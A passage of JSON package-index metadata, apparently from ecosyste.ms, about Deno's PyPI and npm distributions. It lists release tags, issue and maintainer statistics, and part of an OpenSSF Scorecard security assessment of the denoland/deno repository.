","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-22T20:11:21.932Z","dependent_packages_count":0,"downloads":178784,"downloads_period":"last-month","dependent_repos_count":3,"rankings":{"downloads":25.812529619494594,"dependent_repos_count":8.976891510839746,"dependent_packages_count":10.05962490376147,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":14.949682011365269},"purl":"pkg:pypi/deno","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/pypi/deno","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/pypi/deno","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/pypi/deno/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-22T15:36:05.774Z","issues_count":6593,"pull_requests_count":9606,"avg_time_to_close_issue":17240482.91906903,"avg_time_to_close_pull_request":1537756.603103103,"issues_closed_count":3779,"pull_requests_closed_count":7991,"pull_request_authors_count":571,"issue_authors_count":2462,"avg_comments_per_issue":2.5116032155316246,"avg_comments_per_pull_request":0.7158026233603998,"merged_pull_requests_count":6976,"bot_issues_count":0,"bot_pull_requests_count":47,"past_year_issues_count":659,"past_year_pull_requests_count":1189,"past_year_avg_time_to_close_issue":1375932.5787037036,"past_year_avg_time_to_close_pull_request":1325136.485893417,"past_year_issues_closed_count":216,"past_year_pull_requests_closed_count":638,"past_year_pull_request_authors_count":177,"past_year_issue_authors_count":370,"past_year_avg_comments_per_issue":1.2109256449165402,"past_year_avg_comments_per_pull_request":1.07905803195963,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":16,"past_year_merged_pull_requests_count":468,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1779,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":673,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":288,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":281,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":377,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":187,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"crowlKats","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"devsnek","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"ry","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages/deno/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages/deno/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages/deno/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages/deno/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages/deno/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages/deno/codemeta","maintainers":[{"uuid":"manzt","login":"manzt","name":null,"email":null,"url":null,"packages_count":27,"html_url":"https://pypi.org/user/manzt/","role":"Owner","created_at":"2025-06-10T02:02:51.597Z","updated_at":"2025-06-10T02:02:51.597Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/maintainers/manzt/packages"}],"registry":{"name":"pypi.org","url":"https://pypi.org","ecosystem":"pypi","default":true,"packages_count":932048,"maintainers_count":400518,"namespaces_count":0,"keywords_count":313027,"github":"pypi","metadata":{"funded_packages_count":59245,"rate_limit":2},"icon_url":"https://github.com/pypi.png","created_at":"2022-04-04T15:19:23.364Z","updated_at":"2026-09-01T05:03:28.950Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/namespaces"}},{"id":11161877,"name":"@deno/linux-x64-glibc","ecosystem":"npm","description":"linux-x64-glibc distribution of Deno","homepage":"https://deno.land","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":"deno","versions_count":96,"first_release_published_at":"2024-12-12T21:25:36.449Z","latest_release_published_at":"2026-08-27T17:36:19.281Z","latest_release_number":"2.9.6","last_synced_at":"2026-08-29T21:56:46.198Z","created_at":"2024-12-12T22:00:15.576Z","updated_at":"2026-08-29T21:56:46.198Z","registry_url":"https://www.npmjs.com/package/@deno/linux-x64-glibc","install_command":"npm install @deno/linux-x64-glibc","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"lts":"2.2.15","latest":"2.9.6"},"contentPolicy":null},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-22T12:52:12.000Z","size":247311,"stargazers_count":108275,"open_issues_count":1528,"forks_count":6351,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-22T15:40:08.889Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-22T14:38:59.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code 